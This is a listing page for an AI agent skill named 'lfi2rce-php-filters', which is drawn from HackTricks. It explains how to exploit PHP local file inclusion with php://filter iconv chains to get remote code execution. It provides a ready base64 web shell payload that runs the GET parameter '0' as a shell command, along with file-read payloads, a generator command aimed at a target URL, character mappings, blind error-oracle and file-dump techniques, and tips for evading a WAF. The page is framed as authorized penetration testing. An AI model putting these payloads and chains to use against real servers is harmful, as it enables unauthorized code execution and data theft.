OpenSkillIndex← back to search

Hacktricks-skills lfi2rce-php-filters

Exploit Local File Inclusion (LFI) vulnerabilities in PHP applications using filter chains to achieve Remote Code Execution (RCE). Use this skill whenever the user mentions LFI, file inclusion, PHP filters, php://filter, or wants to exploit PHP vulnerabilities to read files or execute code. Also trigger for requests about php://temp, iconv filters, base64 encoding tricks, or PHP filter chain generation.

install
source · Clone the upstream repo
git clone https://github.com/abelrguezr/hacktricks-skills
manifest: skills/pentesting-web/file-inclusion/lfi2rce-via-php-filters/SKILL.MD
source content

LFI2RCE via PHP Filters

Overview

This skill helps you exploit Local File Inclusion (LFI) vulnerabilities in PHP applications by using PHP filter chains to generate arbitrary code without writing to disk. The technique uses 

convert.iconv
and 
convert.base64
filters to construct payloads that execute when included.

Core Concept

PHP filters can generate arbitrary content as output. By chaining filters, you can:

  1. Prepend 
    \x1b$)C
    to a string using 
    convert.iconv.UTF8.CSISO2022KR
  2. Apply iconv conversions that preserve your base64 while converting the prepended bytes
  3. Base64 decode/encode to remove garbage characters
  4. Repeat until you've constructed your full base64-encoded PHP payload
  5. Final decode to get executable PHP code

Key Filters

  • convert.iconv.UTF8.CSISO2022KR
    - Always prepends 
    \x1b$)C
  • convert.base64-decode
    - Tolerant, ignores invalid base64 chars
  • convert.iconv.UTF8.UTF7
    - Removes 
    =
    characters that break base64

Resource Selection

Use 

php://temp
as the resource because:

  • It accepts any appended extension (e.g., 
    .php
    )
  • No file write required
  • Works even when includes append 
    .php
    automatically

Safety Warning

AUTHORIZED USE ONLY: This skill is for security testing on systems you own or have explicit permission to test. Unauthorized exploitation is illegal and unethical.

Quick Start

Basic Exploit Structure

// Target vulnerable include
php://filter/[FILTER_CHAIN]/resource=php://temp

Common Payloads

GoalBase64 Payload
Execute command
PD89YCRfR0VUWzBdYDs7Pz4
(<?=`$_GET[0]`;;?>)
Read file
PD8=ZmlsZV9nZXRfY29udGVudHMoJF9HRVRbJ2YnXSk7Pz4=
Display info
PD89cGhwaW5mbygpOz8+

Using the Filter Chain Generator

Method 1: Use the bundled script

python scripts/generate_filter_chain.py --payload "<?=`$_GET[0]`;;?>" --target "http://example.com/vuln.php"

Method 2: Manual construction

  1. Base64 encode your PHP payload
  2. For each character in the base64 string (reversed):
    • Look up the conversion chain for that character
    • Add 
      convert.base64-decode|convert.base64-encode
      to clean
    • Add 
      convert.iconv.UTF8.UTF7
      to remove 
      =
      signs
  3. Final 
    convert.base64-decode
    to get PHP code

Character Conversion Mappings

The script includes mappings for all 64 base64 characters. Key examples:

conversions = {
    'R': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.MAC.UCS2',
    'B': 'convert.iconv.UTF8.UTF16LE|convert.iconv.UTF8.CSISO2022KR|convert.iconv.UTF16.EUCTW|convert.iconv.CP1256.UCS2',
    'C': 'convert.iconv.UTF8.CSISO2022KR',
    '8': 'convert.iconv.UTF8.CSISO2022KR|convert.iconv.ISO2022KR.UTF16|convert.iconv.L6.UCS2',
    # ... (full mappings in script)
}

Advanced Techniques

Error-Based Oracles

When output is suppressed, use memory bombs to create 1-bit oracles:

  1. Chain memory-intensive filters (e.g., 
    convert.iconv.UTF8.UCS-4LE
    ×12)
  2. Add 
    dechunk
    filter
  3. First leaked base64 digit controls outcome:
    • Hexadecimal → payload collapses silently
    • Non-hex → PHP exhausts memory, throws error
  4. Query repeatedly while rotating base64 digits to front
  5. Read files byte-by-byte even with no output

Lightyear Digit-Set Jumps

For large file dumps via GET parameters:

  1. Build alternative base64 digit sets via iconv sequences
  2. Turn chosen digits into newlines
  3. Prepend hex char, run 
    dechunk
    to jump chunks
  4. Use six-query dichotomy tree to halve candidate sets
  5. Dump files without triggering PHP warnings

Testing Checklist

Before exploiting:

  • Confirm LFI vulnerability exists
  • Verify PHP version (filter chains work on PHP 5.x-7.x)
  • Check if 
    php://temp
    is accessible
  • Test with simple filter first: 
    php://filter/convert.base64-encode/resource=php://temp
  • Verify no WAF blocks filter syntax
  • Confirm you have authorization

Common Issues

ProblemSolution
=
characters break payload		Add 
convert.iconv.UTF8.UTF7
after each base64 encode
Include appends 
.php
Use 
php://temp
as resource
Output suppressedUse error-based oracle technique
Filter chain too longUse Lightyear chunk pruning
WAF blocks filtersTry URL encoding or alternative syntax

References

Next Steps

  1. Run the filter chain generator script to create your payload
  2. Test against the vulnerable endpoint
  3. If output is suppressed, try error-based oracle technique
  4. For large files, use Lightyear digit-set jumps
  5. Document findings for your security report